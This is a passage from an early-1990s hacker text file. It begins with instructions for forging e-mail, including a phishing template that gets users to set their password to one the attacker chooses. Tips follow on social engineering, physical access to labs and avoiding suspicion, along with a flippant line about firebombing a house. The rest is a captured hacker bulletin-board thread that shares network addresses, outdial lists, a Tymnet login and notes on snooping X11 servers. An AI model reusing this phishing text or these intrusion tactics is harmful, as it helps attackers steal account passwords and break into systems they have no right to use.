OK. Next, "DATA" You will be told to enter a message and end with a "." Enter something along these lines... "Due to a recent series of dictionary hacking attempts, all users will be required to temporarily change their passwords. Your account will automatically be expired if you do not comply within 24 hours of reading this message. Your new password is jY2s!in@ I am sorry for the inconvience, but you may not change your password until further notice. Please mail me only if you believe your account has already been broken into; this is a system wide policy and I do not have time to read a message from every user. To change your password, type: "passwd" Then enter your old password when it asks (you will not see the characters you are typing), and enter jY2s!in@ as your new password. Thank you." When you are finished, type a ".", then "quit". Be sure that when you are typing the header info that you do not make any mistakes since the remote system will not recognize a backspace correctly. Also, it will say in the header of the message "RECIEVED FROM: [whatever address you are using]". But if the user is dumb enough to change their password on the basis of a mail message, they probably aren't going to notice this. You can also use this trick to send mail to friends if you don't have an account, or you can get your jollies freaking people out with messages from the White House or the KGB. OTHER TIPS-- EXPLOIT THE PEOPLE FACTOR Remember that a system can never be anymore more secure than its users are. Get to know people, be friendly, help out new- users. While the system may appear uncrackable, an ignorant user can let drop a hint. Inside info can really simplify things. "Be good to others; there's something in it for you." -- The Tick Try calling the computing services department and milk the operators for all they're worth. They usually don't know anything about computers and even less about security--they just work there. EXPLOIT ON SITE NEGLIGENCE Some computers are damn near impossible to get into remotely because of down links, or oneway security (You can go out from the computer, but can't get in). These computers are great targets because they are often research type machines with good processors, few users, and gigs of disk space. All the remote security in the world is useless if you can walk into the lab and log right onto the machine--and 9 times out of 10, you can. ACT LIKE YOU BELONG Anytime you are messing around in a graduate lab or somewhere you're not supposed to be, act like you belong. Most of the other people in there aren't going to care because they will be busy themselves. If you look busy and at home no one will question you. If you look nervous and out of place, someone will start bugging you. Think of an alibi BEFORE hand and get all the details straight in your mind. This way if someone questions you, you can be ready with a quick answer. BLEND INTO THE ENVIRONMENT On a system where almost every user appears normal, with normal names and no plans, don't chfn to "!!k-c00l c0dez kid!!" and stick your favorite Venom lyrics in the .plan file. Seem like any other user. In fact, you can even go as far as to chfn to "MARK L. WAGNER", or something in all-caps so that you look like an illiterate new user. Also you might wish to change to a female name because sys-admins aren't likely to suspect female crackers. Also, don't wantonly destroy system files or break into a system so that you can crash it! If you have a personal vendetta against a user or something, firebomb his house, because crashing a machine for the sake of crashing it is really stupid. LOCATE OTHER MISCREANTS Find other deviant minds and share your information. Be careful though who you tell because if too many people start using one dialout/in then someone will notice and close it up, and remember that Big Brother is Watching. ======== Phile 12 ======== The following is a capture of the posts on Lutzifer as of 10/06/91... -------- Message 1 From gandalf at 03:44:36 on Sun Jun 9 Subject: test yea yea yea ========================= Message 2 From lutz at 15:59:47 on Sun Jun 9 Subject: new bullet hiya all ! wonderful things happened l8ly ! gand wrote a new, more secure version of bullet, so all users will b able to discuss again ! many thanx to him Lutz ========================= Message 3 From anduril at 22:11:17 on Sun Jun 9 Subject: Linz NUA Hi all ! I'm very glad to have a bullet again, thanx to gand and lutz ! I'm desperatly searching for the NUA of the IBM-mainframe of the University of Linz ( Austria ). I need to access it via the Aconet. /Anduril ========================= Message 4 From danhackr at 22:40:41 on Sun Jun 9 Subject: Back Again Love You, gandy! :-) ========================= Message 5 From wandii at 03:36:55 on Mon Jun 10 Subject: oops, you forgot to take the shell escape out! ========================= Message 6 From tchhacky at 04:35:50 on Mon Jun 10 Subject: Awesome Thanks gandalf.. and anyone, does anyone know what the address 26245490040004 is to? obviously a Unix, but I mean, who owns it? Thanx in advance. Tchhacky. email me or reply via bullet. ========================= Message 7 From tchhacky at 04:37:47 on Mon Jun 10 Subject: oops that was 26245890040004. thanx ========================= Message 8 From equal at 04:38:15 on Mon Jun 10 Subject: Cool! very good gandalf! thanks for putting it back up! ========================= Message 9 From gandalf at 04:46:51 on Mon Jun 10 Subject: altger! altger's at 26245890040004 m8, like this place sort of login as guest or whatever ========================= Message 10 From mordor at 16:41:07 on Mon Jun 10 Subject: Burp! ooooooohhh I loooooveeeee you gandalf !!!!!!! Here ave a bunch of roses xxx 0000 xxx ========================= Message 11 From mordor at 16:44:11 on Mon Jun 10 Subject: SCO UNIX As you are an expert on unix gand, you couldnt tell me where I could get hold of some unix software, any would be much appreciated, as I have SCO SCO UNIX SYSTEM V and I need some guidance and bulletin board software az im starting up a multi line BBS in the uk.... Cheers .... /\/\ordor ========================= Message 12 From anduril at 17:53:45 on Mon Jun 10 Subject: X11 -spy Hi all ! I've been told that if you can connect to any X11 server, you can tell it to send you all keystrokes. This is of course a BIG security gap. Has anyone programmed a spy ?? ne1 experience with hacking using X11 ? /Anduril ========================= Message 13 From galileo at 19:57:30 on Mon Jun 10 Subject: Well done Cheers for the good job ol' chap Nice one indeed. The_Phuckin_Star_Gazer. ========================= Message 14 From heartz at 00:03:12 on Tue Jun 11 Subject: good stuff, glad to see it back. h. ========================= Message 15 From gandalf at 00:45:29 on Tue Jun 11 Subject: x11 hacking Erm, theres no security with X11 at all - either you can connect to the server's socket in /tmp/.X11-unix/X0 (usually) or its inet domain socket on port 6000 and fuck with some1 elses server. xhost provides some protection tho as does xauth. On most systems you can steal a copy of the screen as the frame buffer (/dev/fb) is left 666 even when some1 is usin it.. ========================= Message 16 From danhackr at 00:54:50 on Tue Jun 11 Subject: Mail lists Someone posted here a few months ago infos about how to subscribe to mailing list like Phrack etc... Could you pse post again the address to write to? tnx. ========================= Message 17 From burntkid at 03:54:19 on Tue Jun 11 Subject: Thanks Thanks for putting up the bulletins it's been a long time but now finally there back up thanks gandalF! gregreets from amitech BK ========================= Message 18 From goldhawk at 14:48:34 on Tue Jun 11 Subject: chat Call this chat. hp800.lasalle.edu 1234 pw=hack dude on qsd just gave it to me. ========================= Message 19 From boris at 20:50:57 on Wed Jun 12 Subject: hi all Thanks Lutz and Gand for putting the bullet back up! Been missing it pretty bad... cheers, Boz ========================= Message 20 From feoh at 06:32:41 on Thu Jun 13 Subject: GS/1's Sorry about that last post :( but I forgot that x25 kill's you if you hit a backspace! :-) MANY THANKS To gandalf for putting this back up and hey, try the chat that's built into our DikuMUD goldman.gnu.ai.mit.edu port 4000 ========================= Message 21 From canine at 06:33:50 on Thu Jun 13 Subject: UNIX BBS Mordor, Get some BBS software at 718-897-2521 Tell them I sent ya, they have XBBS, maybe some others. Canine ========================= Message 22 From canine at 06:37:17 on Thu Jun 13 Subject: ok! Thanks for putting bullet back up! This place isnt the same without it. Canine ========================= Message 23 From gandalf at 08:05:39 on Thu Jun 13 Subject: goldman.ai.mit mud does wing still have anything to do with that? or have they fucked him off after him destroying mit and causing it to be shutdown for every1 else? (yes i do have evidence!) ========================= Message 24 From feoh at 09:06:00 on Thu Jun 13 Subject: re: wing No wing forced his way into our MUD. he made a few good contributions while he was there .. and then he suddenly bowed out vvoluntarily.. who knows. ========================= Message 25 From mordor at 12:16:43 on Thu Jun 13 Subject: Unix bbs Cheerz m8 much appreciated ! It'll cost me a bomb to call there, but i neeed the software bbfn and fanx again ! /\/\ ordor ========================= Message 26 From blammo at 06:34:03 on Fri Jun 14 Subject: NUAs does anyone have any NUAs in really outback places? like: anywhere in africa anywhere in the middle east anywhere in asia also, some not-so-outback places in there like japan, korea, china, etc. thanx, midnite. ========================= Message 27 From mordor at 12:12:11 on Fri Jun 14 Subject: The otbacjk Must of the coutries you suggest have trouble getting an acient telecoms system to work properley, never mind x25 lines !!!! I jk know I have been in many of these countries !! Africa (Sotuth Africa) & Parts of Japan have x25 lines but as for hi-texc outfidials forget it! Find yourself a global outdfioal ! /\/\ordor - Ive been workin in ng nigeria recently You should see that telecoms system, - your luck if you can call next fucking door !!!! ========================= Message 28 From blammo at 18:45:16 on Fri Jun 14 Subject: outback i have plenty of global ODs...i was just wondering if anyone had NUAs in any of those countries..i wanna scan them a little. i know japan, china, korea, south africa, singapore, and other countries around there have x25 networks. i would imagine india does, and probably egypt too. most middle east countries could easily afford one, so some of them probably have networks. i already have singapore and s. africa..and 1 in japan, but that one doesn't work... ========================= Message 29 From gauloise at 20:20:12 on Fri Jun 14 Subject: Uni of Card. Does anybody know the NUA of the University of Cardiff? I need it real bad . thanx from the cigarrette. ========================= Message 30 From gandalf at 20:28:38 on Fri Jun 14 Subject: cardiff what machine at cardiff? their multics? maybe its jan et address is all u need if u wanna connect - dunno if n e of their stuff is on x25 2 - but u could check out the janet news machine n e way which could tell u addresses etc ========================= Message 31 From gandalf at 22:06:42 on Fri Jun 14 Subject: internet anon ftp if n e 1 doesnt yet know about this - if ur lookin 4 n e thing specific, u can use `archie' to search for it. telnet to quiche.cs.mcgill.ca (132.206.2.3 or 132.206.51.1) login as archie. then u can type help. ========================= Message 32 From heartz at 23:12:35 on Fri Jun 14 Subject: other nets Blammo- I think I have a couple nua's for som e other networks that you're looking for, I've got S. Afr. somewhere, gimme a day, I'll look for it, but I hope soviet will be fine for now. [2502]xxxxxx 040300 030500 I believe they still work, try them. heartz. ========================= Message 33 From kaleidox at 09:46:17 on Sat Jun 15 Subject: outback You might try the chat at 440881807401...it isn't new or great, but it's in Hong Kong... ========================= Message 34 From blammo at 18:38:26 on Sat Jun 15 Subject: NUAs heartz- thanks..i have 2 in s. africa already, so don't worry about those.. unless you have them laying around.. i'll check the soviet ones out. -midnite ========================= Message 35 From blammo at 18:39:43 on Sat Jun 15 Subject: nua ii thanks kal..mainly, i'm just looking for full NUAs, so i can scan.. i have a bunch of DNICs, but i needed to know the length of the full NUA in order to scan. -midnite ========================= Message 36 From heartz at 00:20:45 on Sun Jun 16 Subject: Yeah Understandable, I made up a dnic list and have been fitting in the NUA formats...it's not easy, but it's informative. ie: DNIC\|NUA Format ____\|_______________ 3020\|3020xxxxxxxxyy \|Datapac \|Canada some got cut but it's Network Name and then Country. good luck on the S. Africa. btw: the 4408 chat is Kamome in Japan. heartz. ========================= Message 38 From galileo at 22:50:28 on Mon Jun 17 Subject: S_Africa X25 Well, I have called a few places in S_Africa on a nua, and I usually got jolly good connections! One of them was a unix that even had a Korn Chat. Galileo (The Phukin Star_Gazer) ========================= Message 39 From galileo at 22:54:43 on Mon Jun 17 Subject: Cardiff Cardiff? Lemme see... this mite be outa date but nuas should be the same... 2342 2223 6163 2342 2223 6163 00 Hope they werk ok for you. Gali (The_Phukin_Star_Gazer) ========================= Message 40 From gauloise at 00:32:10 on Tue Jun 18 Subject: Tymnet-NUA I am desperately lookin fer the R-Nua for Tymnet in Germany. 45611040250 doesn't work anymore. HELP !!! ========================= Message 41 From anduril at 10:25:30 on Tue Jun 18 Subject: Leoben - Hack Hi all ! I heard that a hacker broke into the computers of Leoben University, Austria doing quite a damage. Any1 knowing more about that ? /Anduril ========================= Message 42 From gandalf at 14:07:02 on Tue Jun 18 Subject: re: Leoben are they on internet? ========================= Message 43 From vmem at 18:52:54 on Tue Jun 18 Subject: Wing, and MiT Gandy, even though you h8 the guy alot, he didn't cause Mit to shut down their System's I talk to Noah Friedman and he said it was the guest acnt's that were being asshole's trying to break into nasa shit, stupid code kid stuff ftp ing passwd files and shit... not Wing. Virtual Memory Baked Again :) ========================= Message 44 From anduril at 21:26:13 on Tue Jun 18 Subject: re: re: leoben No, don't think so. There is a private X.25 net ( a ring ) connecting all Austrian universities ( Aconet ). As far as I know, only Vienna ( WU, UNI, TU) and Linz have got Internet connectrivity yet. Most hos ts on Aconet are VAXes running VMS => There is a lot of DECnetting on Aconet. I can provide most NUAS, but my list seems to be outdated since the leased lines are insatlled. /Anduril ========================= Message 45 From gandalf at 21:46:36 on Tue Jun 18 Subject: wing & mit vmem writes: > System's I talk to Noah Friedman and he said it was the guest acnt's that were being asshole's trying to break into nasa shit, stupid code kid stuff ftp ing passwd files and shit... not Wing. what do u think wing used it for? ftp'ing passwd files and shit.. (yea go ask him if u like, i can givee u site names). ========================= Message 46 From blammo at 02:24:30 on Wed Jun 19 Subject: ODs can someone post the PCP OD list? -midnite ========================= Message 47 From lutz at 02:37:20 on Wed Jun 19 Subject: new account-proceedings hiya all ! finally i got managed to write down all new behaviour i thought of and discussed in the last time. please inform urself by reading under 'accs' greets Lutz Message 47 From lutz at 02:37:20 on Wed Jun 19 Subject: new account-proceedings hiya all ! finally i got managed to write down all new behaviour i thought of and discussed in the last time. please inform urself by reading under 'accs' greets Lutz ========================= Message 48 From touchton at 03:25:23 on Wed Jun 19 Subject: Hmmm.. I talked to Mr. Friedman as well today, applying for a legitimate guest account, and he cited the reason as having been the recent deletion of all files on a particular GNU system. That might be the underlying reason, in more specific detail. - Plutus ========================= Message 50 From galileo at 06:30:57 on Wed Jun 19 Subject: SOMEONE Please someone delete msg 49. Cheers Star_Gazer ========================= Message 51 From feoh at 14:12:18 on Wed Jun 19 Subject: Wing and MIT Well whether it was wing or not, this is what really happened that led to GNU shutting down the machines a SECOND time in the past few weeks... someone A: truncated the password file in an attempt to get themselves root. B: deleted MASSIVE amounts of files, etc. C: somehow installed a daemon to insure they'd always have an account. I Dont have details on this one yet so I'll keep ya posted. -feoh ========================= Message 52 From feoh at 14:13:24 on Wed Jun 19 Subject: new behavior (postage rates anybody?) so are we supposed to use IRC's? or guess and use regular stamps? and do we have the adress to send these things to yet? just curious. -feoh ========================= Message 53 From mordor at 15:40:19 on Wed Jun 19 Subject: Wing Yes Wing is responsable, he deleted all the files in the /bin didirectory, this is the main reason why the guest accounts died off !!! People like wing have serious attitude problems, I would hope that lutz might refrain from renewing his account /\/\ordor ========================= Message 54 From mordor at 15:41:32 on Wed Jun 19 Subject: MIT Relating to the MIT machines, can anyone tell me how to mail the request account on there ??, from this system or otherwise ?? Cheerz /\/\ordor ========================= Message 55 From lutz at 18:07:18 on Wed Jun 19 Subject: Re: new behaviour (postage) hi yes, a friend said it already too... i'll ask our post-office how to manage that special situation. the adress to send that stuff to is already there, inside 'new' and also on the 'formular' getable by 'request'. greets, i'll hurry (btw: does someone know a practical solution ?) ========================= Message 56 From ronnie at 18:26:40 on Wed Jun 19 Subject: well.. seeing as I dont stay in one place too long.. i dont see what good my address would do to you anyway.. I could just leave onewhere i could be contacted at.. thats about the best i could do. l. ========================= Message 57 From feoh at 19:17:51 on Wed Jun 19 Subject: solution I'd like to suggest a modification of your solution lutz... rather than sending ppl their password, just have them include it in the request letter.. if they're serious enough to actually write you and mail the erequest I think you'll do ok.. Just a thought -feoh ========================= Message 58 From gandalf at 19:36:07 on Wed Jun 19 Subject: mailing mit You could try mailing altger!impch!root%mole.gnu.ai.mit.edu from here. As far as i know, the idea is that you mail them a pre-crypted password, ie change ur password on some system to what you want, and send them the encryption from your password file. ========================= Message 59 From blammo at 22:03:34 on Wed Jun 19 Subject: access lutz- do you really think it's necessary to go through all this trouble for accounts? i can understand how you want to make sure each person gets only one account..but mailing a password is quite a bit of trouble and won't solve the problem. people could easily mail it to a friend, PO box, remailer, or any number of places in order to obtain multiple accounts. also, how will you benefit from having the real information? the system seems to be running well as it is, aside from a few occassional problems with users- which really can't be avoided in any practical way. ========================= Message 60 From kaleidox at 01:40:10 on Thu Jun 20 Subject: new access rules Agreed...there are really not to many people who cause problems..it seems unnecessary to have current users have passwords mailed to them.. Current users who start a problem can easily be deleted... ========================= Message 61 From vmem at 06:26:02 on Thu Jun 20 Subject: Gandy Gandy Dewdn, trust me, he maybe did alot of shit on MIT but why ftp passwd files? most of the time they are shadowed, but I can remember why MIT MIGHT HAVE DID IT, but I doubt it... And if you know, which I doubt, then send me mail and tell me what he "did" l8r Virtual Memory ========================= Message 62 From dastar at 06:52:42 on Thu Jun 20 Subject: shit Its always 1 mother fucker who ruins it for everyone else. Same thing happened with a local PBX. I used it only on local calls to cloak mysself from offending traces and such and some local fuck loser abuses the fuck out of it calling long distance from it for hours at a time and kills it. All it takes is one shit he ad and they always seem to find the things that matter to you. At any rate, I agree that users who currently already have an account shouldn't have to mail their information to obtain a new account simply because it is a pain in the ass. Not a big pain in the ass but its something you just don't want to do if you harbor any paranoid suspicions (as I do). I really sympathize with your situation Lutz, and I know that you want to keep the dregs off as much as I as I have experienced the bullshit of other users who don't take anything seriously (ie. Mr. "I'll enter .b 400 times just to piss everyone off-Gee I'm cool."). At any rate, I agree with Kaleidox. Any user who is already on and causes trouble can be deleted quite easily. But if y ou insist on this procedure, I just may do it. A while back I suggested a feature wherein if a user becomes a problem and it i>`woticed by a lot of people (thus to counter potential abuse of the feature) they could all put in a vote from a command in the main menu to kick the user off, and if enough votes came in he would be automatically deleted (or subject to approval from Lutz first so that people don't mercilessly gang up on some poor dude). Its not the greatest idea but it would work OK. ========================= Message 63 From dastar at 07:01:07 on Thu Jun 20 Subject: stuff I've heard of people getting busted lately, both first hand and thru word of mouth. Friend of mine got visited by the SS in April and had all his shit confiscated. It seems people hacking on ROLM PBXs have been getting nailed. Seems after that ROLM HACK file got out to a lot of people and the abuse started getting major, ROLM decided to fight back and nab the people fucking with their PBXs. Anyway, in America, like i t or not, we live in a fucked and, yes, oppressive society (if you're not a G. Bush clone). Our rights are being insidiously eroded away with each passing day and each new bill passed in the legislature. We're being fucked. I'm pissed. A lot of hackers are going down simply because they have intelligence, which is something that scares the government. That's a fucking tragedy. So Fuck the Government, Fuck the Beauracracy, and Fuck the Politicians. ...and stay free! DC ========================= Message 64 From galileo at 14:14:39 on Thu Jun 20 Subject: PCP list Yo midnite et all Hope this is some use: The Warped Reality PC-PURSUIT Outdial Listing Compiled 5-12-91 by Disk Jockey/WR Additions, corrections (please check these!), and deletions, call: 800-288-2699, box 872; hit # after it is done talking. Area codes not shown are invalid, in Canada, or not in continental US. These areas are not served by PC-PURSUIT. FORMAT: 3110aaa00xxx. aaa=Area Code, xxx=numbers below. NOTE: ^=working but baud unchecked, ?=completely unchecked. AREA 300 1200 2400 AREA 300 1200 2400 CODE Baud Baud Baud CODE Baud Baud Baud --- ------- ---------- ---------- --- ---------- ---------- ---------- 201..........001^,301^..022?...... 202..115?.......116?,301?..117?,703?. 203..121.....120........105....... 205.................................. 206..205^....206^.......208^...... 207.................................. 208............................... 209.................................. 212..316?....315?.......028?,718?. 213..103^,412^..456?.......413^,023.. 214..117?....118?.......022?,817?. 215..005?.......112?.......022?...... 216..020?....021?.......120?...... 217.................................. 218............................... 219.................................. 301............................... 302.................................. 303..114?....021?.......115?...... 304.................................. 305..120?....121?.......122?...... 307.................................. 308............................... 309.................................. 312..410?....411?,815?..024?,022?. 313..214?.......216?.......024?...... 314..217?....020?,815?..005?,312?. 315.................................. 316............................... 317.................................. 318............................... 319.................................. 401............................... 402.................................. 404..113?....114?.......022?...... 405.................................. 406............................... 407.................................. 408..110?....111?.......021?...... 409.................................. 412............................... 413.................................. 414..020?....021?.......120?...... 415..005,108?,..109?,216?,.011,217?,. .................................. ^^^..215?.......023?.......224?...... 417............................... 419.................................. 501............................... 502.................................. 503..020?....021.................. 504.................................. 505............................... 507.................................. 508............................... 509........................... ....... 512............................... 513.................................. 515............................... 516..015........014.................. 517............................... 518.................................. 601.....................023?...... 602..022?.......023?.......026?...... 603............................... 605.................................. 606............................... 607.................................. 608............................... 609.................................. 612..120?....121?.......022?...... 614.......................... ........ 615............................... 616.................................. 617............................... 618.................................. 619............................... 701.................................. 702............................... 703.................................. 704............................... 707.................................. 708............................... 712.................................. 713..113?.......114.....024?...... 714..023?,119?,.024?,121?,.004?,102?, .................................. ^^^..210?.......213?.......619?...... 715............................... 716.................................. 717 ............................... 718........................352?...... 719............................... 801..020?.......021?.......124?,012?. 802............................... 803.................................. 804............................... 805........................030?...... 806............................... 808.................................. 809............................... 812.................................. 813..020?.......021?....124....... 814.................................. 815.....................310?...... 816..104?.......113?.......913?...... 817............................... 818..020?.......021?.......124?...... 901............................... 903.................................. 904............................... 906.................................. 907.....................030?...... 908.................................. 912............................... 913.................................. 914............................... 915.................................. 916............................... 918.................................. 919............................... ========================= Message 65 From gandalf at 14:52:06 on Thu Jun 20 Subject: re gandy gandy vmem: rather than me sendin u mail, go take a look at his directory at mit - ask someone to restore it from backups if it aint there (and if they have backups). and for the record, most passwd files still arent shadowed. about 3% of sun users bother to install the C2 security package. ========================= Message 66 From mayhem at 15:00:11 on Thu Jun 20 Subject: another PCP list TeleNet PC-Pursuit OutDials Compiled and Formatted By Ixom +-New Jersey-------------------+ \| 03110 201 00 001 1200 Baud \| \| 03110 201 00 022 2400 Baud \| \| 03110 201 00 301 1200 Baud \| +-District of Columbia---------+ +-Wisconsin--------------------+ \| 03110 202 00 115 300 Baud \| \| 03110 414 00 020 300 Baud \| \| 03110 202 00 116 1200 Baud \| \| 03110 414 00 021 1200 Baud \| \| 03110 202 00 117 2400 Baud \| \| 03110 414 00 120 2400 Baud \| +-Connecticut------------------+ +-California-------------------+ \| 03110 203 00 105 2400 Baud \| \| 03110 415 00 005 2400 Baud \| \| 03110 203 00 120 1200 Baud \| \| 03110 415 00 011 2400 Baud \| \| 03110 203 00 121 300 Baud \| \| 03110 415 00 023 ???? Baud \| +-?????------------------------+ \| 03110 415 00 108 300 Baud \| \| 03110 205 00 005 1200 Baud \| \| 03110 415 00 109 1200 Baud \| \| 03110 205 00 022 2400 Baud \| \| 03110 415 00 215 300 Baud \| +-Washington-------------------+ \| 03110 415 00 216 1200 Baud \| \| 03110 206 00 205 300 Baud \| \| 03110 415 00 217 2400 Baud \| \| 03110 206 00 206 1200 Baud \| \| 03110 415 00 224 2400 Buad \| \| 03110 206 00 208 2400 Baud \| +-Oregon-----------------------+ +-New York---------------------+ \| 03110 503 00 020 300 Baud \| \| 03110 212 00 028 2400 Baud \| \| 03110 503 00 021 1200 Baud \| \| 03110 212 00 315 1200 Baud \| +-Arizona----------------------+ \| 03110 212 00 316 ???? Baud \| \| 03110 602 00 021 1200 Baud \| +-California-------------------+ \| 03110 602 00 022 300 Baud \| 03110 213 00 023 2400 Baud \| \| 03110 602 00 023 1200 Baud \| \| 03110 213 00 103 1200 Baud \| \| 03110 602 00 026 2400 Baud \| \| 03110 213 00 412 1200 Baud \| +-Minnesota--------------------+ \| 03110 213 00 413 2400 Baud \| \| 03110 612 00 022 2400 Baud \| +-Texas------------------------+ \| 03110 612 00 120 300 Baud \| \| 03110 214 00 022 2400 Baud \| \| 03110 612 00 121 1200 Baud \| \| 03110 214 00 117 300 Baud \| +-Massachussetts---------------+ \| 03110 214 00 118 1200 Baud \| \| 03110 617 00 026 2400 Baud \| +-Pennsylvania-----------------+ \| 03110 617 00 311 300 Baud \| \| 03110 215 00 005 300 Baud \| \| 03110 617 00 313 1200 Baud \| \| 03110 215 00 022 2400 Baud \| +-Texas------------------------+ \| 03110 215 00 112 1200 Baud \| \| 03110 713 00 024 2400 Baud \| +-Ohio-------------------------+ \| 03110 713 00 113 300 Baud \| \| 03110 216 00 020 300 Baud \| \| 03110 713 00 114 1200 Baud \| \| 03110 216 00 021 1200 Baud \| +-California-------------------+ \| 03110 216 00 120 2400 Baud \| \| 03110 714 00 004 2400 Baud \| +-?????------------------------+ \| 03110 714 00 021 2400 Baud \| \| 03110 301 00 020 1200 Baud \| \| 03110 714 00 023 300 Baud \| +-Colorado---------------------+ \| 03110 714 00 024 1200 Baud \| \| 03110 303 00 021 1200 Baud \| \| 03110 714 00 102 2400 Baud \| \| 03110 303 00 114 300 Baud \| \| 03110 714 00 119 300 Baud \| \| 03110 303 00 115 2400 Baud \| \| 03110 714 00 121 1200 Baud \| +-Florida----------------------+ \| 03110 714 00 210 300 Baud \| \| 03110 305 00 120 300 Baud \| \| 03110 714 00 213 1200 Baud \| \| 03110 305 00 121 1200 Baud \| +-Utah-------------------------+ \| 03110 305 00 122 2400 Baud \| \| 03110 801 00 012 2400 Baud \| +-Illinois---------------------+ \| 03110 801 00 020 300 Baud \| \| 03110 312 00 024 2400 Baud \| \| 03110 801 00 021 1200 Baud \| \| 03110 312 00 410 300 Baud \| +-Florida----------------------+ \| 03110 312 00 411 1200 Baud \| \| 03110 813 00 020 300 Baud \| +-Michigan---------------------+ \| 03110 813 00 021 1200 Baud \| \| 03110 313 00 024 2400 Baud \| \| 03110 813 00 124 2400 Baud \| \| 03110 313 00 214 300 Baud \| +-Missouri---------------------+ \| 03110 313 00 216 1200 Baud \| \| 03110 816 00 104 300 Baud \| +-Missouri---------------------+ \| 03110 816 00 113 2400 Baud \| \| 03110 314 00 005 2400 Baud \| \| 03110 816 00 221 1200 Baud \| \| 03110 314 00 020 1200 Baud \| +-California-------------------+ \| 03110 314 00 421 1200 Baud \| \| 03110 818 00 021 1200 Baud \| +-Alabama----------------------+ +-California-------------------+ \| 03110 404 00 022 2400 Baud \| \| 03110 916 00 007 2400 Baud \| \| 03110 404 00 113 300 Baud \| \| 03110 916 00 011 300 Baud \| \| 03110 404 00 114 1200 Baud \| \| 03110 916 00 012 1200 Baud \| +-California-------------------+ +-North Carolina---------------+ \| 03110 408 00 021 2400 Baud \| \| 03110 919 00 020 300 Baud \| \| 03110 408 00 110 300 Baud \| \| 03110 919 00 021 1200 Baud \| \| 03110 408 00 111 1200 Baud \| \| 03110 919 00 124 2400 Baud \| +------------------------------+ +------------------------------+ DATAPAC OUTDIAL PUBLIC DIAL PORTS/LAST UPDATED: 89-11-15 DATAPAC PUBLIC OUT-DIAL PORT CIRCUIT NUMBERS ========================= Message 67 From fener at 20:55:50 on Thu Jun 20 Subject: Advice The simple act of pu~rtting on a condom can save ur life! Fener. ========================= Message 68 From talmeta at 04:04:25 on Fri Jun 21 Subject: access True...I have no problem with the new rules..but having a new pw mailed to me seems a bit excessive. besides...where am I gonna send a prepaid envelope to ? ========================= Message 69 From dastar at 06:03:49 on Fri Jun 21 Subject: help someone? Out of the good of your hacker heart and in the name of free information exchange could one of you please mail me a working nui other than dynapac1 that will reach here and not be so damned slow? I'd really appreciate it. Thanks..... ========================= Message 70 From orpheus at 08:16:40 on Fri Jun 21 Subject: translation can sum1 who speeks some french pleese give me a rough translationof the following 3 sentences. thank u ** Faire AIDE pour la liste des classes. ATTENTION LE PACX NE SERA PAS DISPONIBLE MERCREDI LE 26 JUIN DE 19:00 A 24:00 POUR PASSER DU PACX 1000 AU NOUVEAU PACX STARMASTER DE GANDALF. classe de service -orpheus ========================= Message 71 From mordor at 10:52:21 on Fri Jun 21 Subject: Tymnet NUI Here is a tymnet nui : Username : T.hongb01 Password : Host Only There you go happy u know wot! ========================= Message 72 From gandalf at 14:23:07 on Fri Jun 21 Subject: re: translation dunno what the franch means, but it looks like a gandalf pacx try help to list the services; if theres no help available u should try numbers - 1, 2, 3 etc which are usually assigned to the services as well as names. ========================= Message 73 From galileo at 16:23:58 on Fri Jun 21 Subject: French garbage Type AIDE for the list of "classes"? Your attention: The PACX will not be available wednesday the 26th of June betwee n 19:00 to 24:00 due to upgrading from PACX 1000 to the new GANDALF STARMASTER P ACX. Well, my french is pretty shit, but that should be roughly what it means. ========================= Message 75 From orpheus at 17:57:10 on Fri Jun 21 Subject: gandalf its a pacx, and there is a list of services too 1 service is datapac (pad) and externe (outdials) whenever i type datapac tho it says CLASS INTERDITE (whatever that means) and ha ngs up same with the externe. ========================= Message 76 From orpheus at 17:58:01 on Fri Jun 21 Subject: wow! thanx galileo! muaha another starmaster. another pad. that makes it 7 pads. ========================= Message 77 From galileo at 18:42:20 on Fri Jun 21 Subject: CLASS INTERDITE Hmmm I think it means sommin like SOD OFF! No, really, INTERDITE means "Not allowed", still don't get what they mean by CLA SS though. ========================= Message 78 From orpheus at 19:32:01 on Fri Jun 21 Subject: class class is same as request, or service. ========================= Message 79 From dastar at 01:16:18 on Sat Jun 22 Subject: nui Thanks for the nui. I appreciate it. Could someone post as complete a CBI dialup list as they have? I only have these five: 305/467-3601 612/341-0023 713/591-8100 804/466-1619 916/635-3935 ========================= Message 82 From kaleidox at 20:03:50 on Sat Jun 22 Subject: files Where can Heartz' files on Gandalfs' be found? They really -would- be helpful... ========================= Message 83 From dastar at 22:33:04 on Sat Jun 22 Subject: yes I was going to ask the same thing. Please post them here if possible. ========================= Message 85 From em at 23:26:46 on Sat Jun 22 Subject: GridPoint BBS CALL THE GRIDPOINT BBS! (718)/897-2521 WE ARE PcPable AT 311021201305 (dial in the format atdt17188972521) This board is completely devoted to the discussion of Hacking, and how to use assorted operating systems. Everyone is welcome. We have 135 megs available being filled rapidly with files. ========================= Message 86 From blammo at 00:37:07 on Sun Jun 23 Subject: people thanks for both OD lists! ========================= Message 87 From quasar at 11:12:20 on Sun Jun 23 Subject: solution by feoh ...yeah ... think its a great idea ! quasar/cult/uucp ========================= Message 88 From galileo at 05:30:45 on Tue Jun 25 Subject: DNIC list Has anybody got a list of DNICS complete with country names? If so, could they please put it up. Cheers Gazer ========================= Message 90 From blammo at 09:16:49 on Tue Jun 25 Subject: DNICs Here are some DNICs w/countries that I have: DNIC Country Network 2041 Netherlands 2062 Belgium 2080 France TransPac 2141 Spain 2145 Spain 2201 Yugoslavia 2222 Italy 2284 Switzerland 2341 UK 2342 UK 2348 UK 2352 2382 Denmark 2405 Sweden 2402 Sweden 2422 Norway 2442 Finland 2502 USSR 2624 Germany 2704 Luxembourg 2724 Ireland 3020 Canada DataPac 3025 Canada 3029 Canada 3103 US ITT 3104 US WUI/MCI 3106 US TymNet 3110 US TeleNet 3125 US 3126 US AutoNet 3134 US AccuNet 4408 Japan 5052 Australia 5053 Aus tralia 5252 Singapore 5301 New Zealand 6550 South Africa 65MNB+QCAfrica 6559 South Africa 4872 Taiwan ========================= Message 91 From gauloise at 17:59:59 on Tue Jun 25 Subject: DNICS Country Network DNIC ------------------------------- Antigua & ! AGANET 3443 Barbuda ! ! Argentina ! ARPAC 7220 ! ARPAC 7222 ! Australia ! AUSTPAC 5052 ! DAS 5053 ! TELETEX 5054 ! Bahamas ! BATELCO 3640 ! Bahrain ! BAHNET 4263 ! Barbados ! IDAS 3423 ! Belgium ! DCS 2062 ! ???? 2063 ! DCS 2068 ! DCS 2069 ! Bermuda ! C&W(IDAS) 3503 ! Brasil ! INTERDATA 7240 ! RENPAC 7241 ! RENPAC 7248 ! RENPAC 7249 ! 